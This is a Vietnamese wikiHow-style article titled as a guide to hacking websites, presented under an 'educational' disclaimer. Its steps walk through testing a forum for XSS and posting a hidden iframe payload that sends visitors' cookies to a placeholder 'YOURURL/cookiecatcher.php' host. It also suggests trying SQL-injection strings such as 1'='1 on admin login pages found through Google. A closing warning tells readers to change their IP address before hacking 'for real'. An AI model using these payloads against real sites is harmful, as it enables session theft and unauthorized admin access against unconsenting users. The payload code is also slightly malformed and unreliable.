Tải về bản PDFTải về bản PDFHow.com.vn là một trang "wiki", nghĩa là nhiều bài viết ở đây là nội dung của nhiều tác giả cùng viết nên. Để tạo ra bài viết này, 98 người, trong đó có một số người ẩn danh, đã thực hiện chỉnh sửa và cải thiện bài viết theo thời gian.
Bài viết này đã được xem 23.761 lần.
Làm thế nào để hack website? Dù hack mọi trang là không thể nhưng bạn hoàn toàn có thể truy cập trái phép vào những trang dễ tấn công, chẳng hạn như một diễn đàn. Trong bài viết này, How.com.vn sẽ hướng dẫn bạn cách hack website thông qua khai thác lỗ hổng cross site scripting (XSS), các kỹ thuật tấn công bằng mã độc hại cũng như đưa ra một số lời khuyên để bạn có được sự chuẩn bị cần thiết cho thành công trong lĩnh vực này. Lưu ý: Bài viết này được viết hoàn toàn với mục đích giáo dục – nhằm giúp người đọc bắt đầu học về cách hack hợp pháp cũng như nhận biết cách thức làm việc của hacker để tự bảo vệ tốt hơn.
Các bước
Tìm một trang dễ tấn công cho phép bạn đăng tải nội dung, chẳng hạn như một diễn đàn nào đó. Lưu ý rằng phương pháp này không hiệu quả với những trang an toàn.
Vào và đăng tải nội dung. Bạn sẽ phải nhập một số code (mã lập trình) đặc biệt vào phần “post” (Đăng) để thu thập toàn bộ dữ liệu của những người nhấp chuột vào nó.- Bạn nên kiểm tra xem liệu code này có bị lọc bởi hệ thống hay không. Hãy đăng
<script>window.alert(“test”)</script>
Nếu hộp cảnh báo xuất hiện khi bạn nhấp chuột vào bài đăng thì nghĩa là website đó không an toàn.
- Bạn nên kiểm tra xem liệu code này có bị lọc bởi hệ thống hay không. Hãy đăng
Tạo và tải chương trình đánh chặn cookie của bạn. Mục đích của cuộc tấn công này là chiếm được cookie của người sử dụng, từ đó truy cập vào tài khoản trên các website có quy trình đăng nhập không an toàn. Lúc này, bạn cần chương trình đánh chặn cookie nhằm chiếm và chuyển hướng cookie của đối tượng mục tiêu. Hãy tải chương trình này lên website hỗ trợ php mà bạn có thể truy cập vào và tham khảo thêm về code của các chương trình đánh chặn.
Đăng chương trình đánh chặn cookie của bạn. Nhập mã phù hợp vào bài đăng được dùng để chiếm cookie và gửi chúng về trang của bạn. Bạn nên nhập một số văn bản sau đoạn code để bài đăng bớt đáng ngờ và không bị xóa.- Chẳng hạn như bạn có thể dùng
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- Chẳng hạn như bạn có thể dùng
Sử dụng cookie thu thập được. Lúc này, bạn có thể sử dụng tùy ý thông tin cookie được lưu vào website của bạn.Quảng cáo
Tìm trang dễ tấn công. Bạn nên tìm những trang có lỗ hổng trong quy trình đăng nhập quản trị. Hãy thử tìm từ khóa admin login.asp trên Google.
Đăng nhập với quyền quản trị. Dùng admin cho tên đăng nhập và thử một vài chuỗi ký tự khác nhau cho phần mật khẩu. Đó có thể là bất kỳ chuỗi nào, thường gặp có thể kể đến 1’, ’1’='1 hoặc 2'='2.
Hãy kiên nhẫn. Nhiều khả năng bạn sẽ phải thử nhiều lần.
Truy cập website. Với những trang dễ tấn công, rồi bạn cũng sẽ tìm được chuỗi ký tự cho phép bạn truy cập bằng quyền quản trị.Quảng cáo
Học một vài ngôn ngữ lập trình. Để hack một cách thực thụ, bạn cần hiểu cách thức hoạt động của máy tính và các công nghệ khác. Việc học cách sử dụng những ngôn ngữ lập trình như Python hay SQL sẽ giúp bạn có được kiểm soát tốt hơn với máy tính và nhận diện được điểm yếu bảo mật trong các hệ thống.
Trang bị kiến thức HTML cơ bản. Bạn cũng cần hiểu sâu về html và javascript, đặc biệt là trong trường hợp bạn muốn hack các website. Dù việc học tiêu tốn thời gian nhưng có vô số cách để bạn có thể học miễn phí trên internet. Chỉ cần bạn muốn, cơ hội vẫn là của bạn.
Tham khảo ý kiến “whitehat” - chuyên gia bảo mật máy tính. Họ là những hacker sử dụng khả năng của mình cho những mục tiêu tốt đẹp, khai thác lỗ hổng bảo mật và cải thiện môi trường internet cho tất cả mọi người. Nếu muốn học hack và sử dụng khả năng của mình một cách đúng đắn hay đơn giản là để bảo vệ website của mình thì bạn nên liên hệ và xin lời khuyên từ các chuyên gia này.
Tìm hiểu về hack. Nếu muốn học cách hack hay tự bảo vệ mình, bạn sẽ phải nghiên cứu khá nhiều. Website có thể bị tấn công theo vô số cách khác nhau và danh sách này biến đổi mỗi ngày. Do đó, bạn sẽ phải không ngừng học hỏi.
Cập nhật. Bởi kỹ thuật hack không ngừng thay đổi, bạn cần không ngừng cập nhật. Chỉ vì lúc này được bảo vệ trước một số loại hack nào đó không có nghĩa là trong tương lai, bạn vẫn an toàn!Quảng cáo
Lời khuyên
- Vào diễn đàn dành cho hacker để có được nhiều lời khuyên hữu ích.
- Chỉ dẫn này được viết hoàn toàn vì mục tiêu giáo dục, với mong muốn giúp mọi người bắt đầu học hack một cách đúng đắn cũng như nhận biết cách thức làm việc của hacker để có thể tự bảo vệ tốt hơn.
Cảnh báo
- Đọc xong bài này, bạn không thể trở thành hacker ngay. Bạn PHẢI trau dồi các kỹ năng và không ngừng luyện tập, luyện tập và luyện tập.
- Nếu định hack thật sự, bạn nên đổi địa chỉ IP bằng các phần mềm sẵn có trên mạng.
Bài viết này đã giúp ích cho bạn?
⚠️ Disclaimer:
Content from Wiki How Tiếng Việt language website. Text is available under the Creative Commons Attribution-Share Alike License; additional terms may apply.
Wiki How does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein.
- - A few of these subjects are frequently censored by educational, governmental, corporate, parental and other filtering schemes.
- - Some articles may contain names, images, artworks or descriptions of events that some cultures restrict access to
- - Please note: Wiki How does not give you opinion about the law, or advice about medical. If you need specific advice (for example, medical, legal, financial or risk management), please seek a professional who is licensed or knowledgeable in that area.
- - Readers should not judge the importance of topics based on their coverage on Wiki How, nor think a topic is important just because it is the subject of a Wiki article.
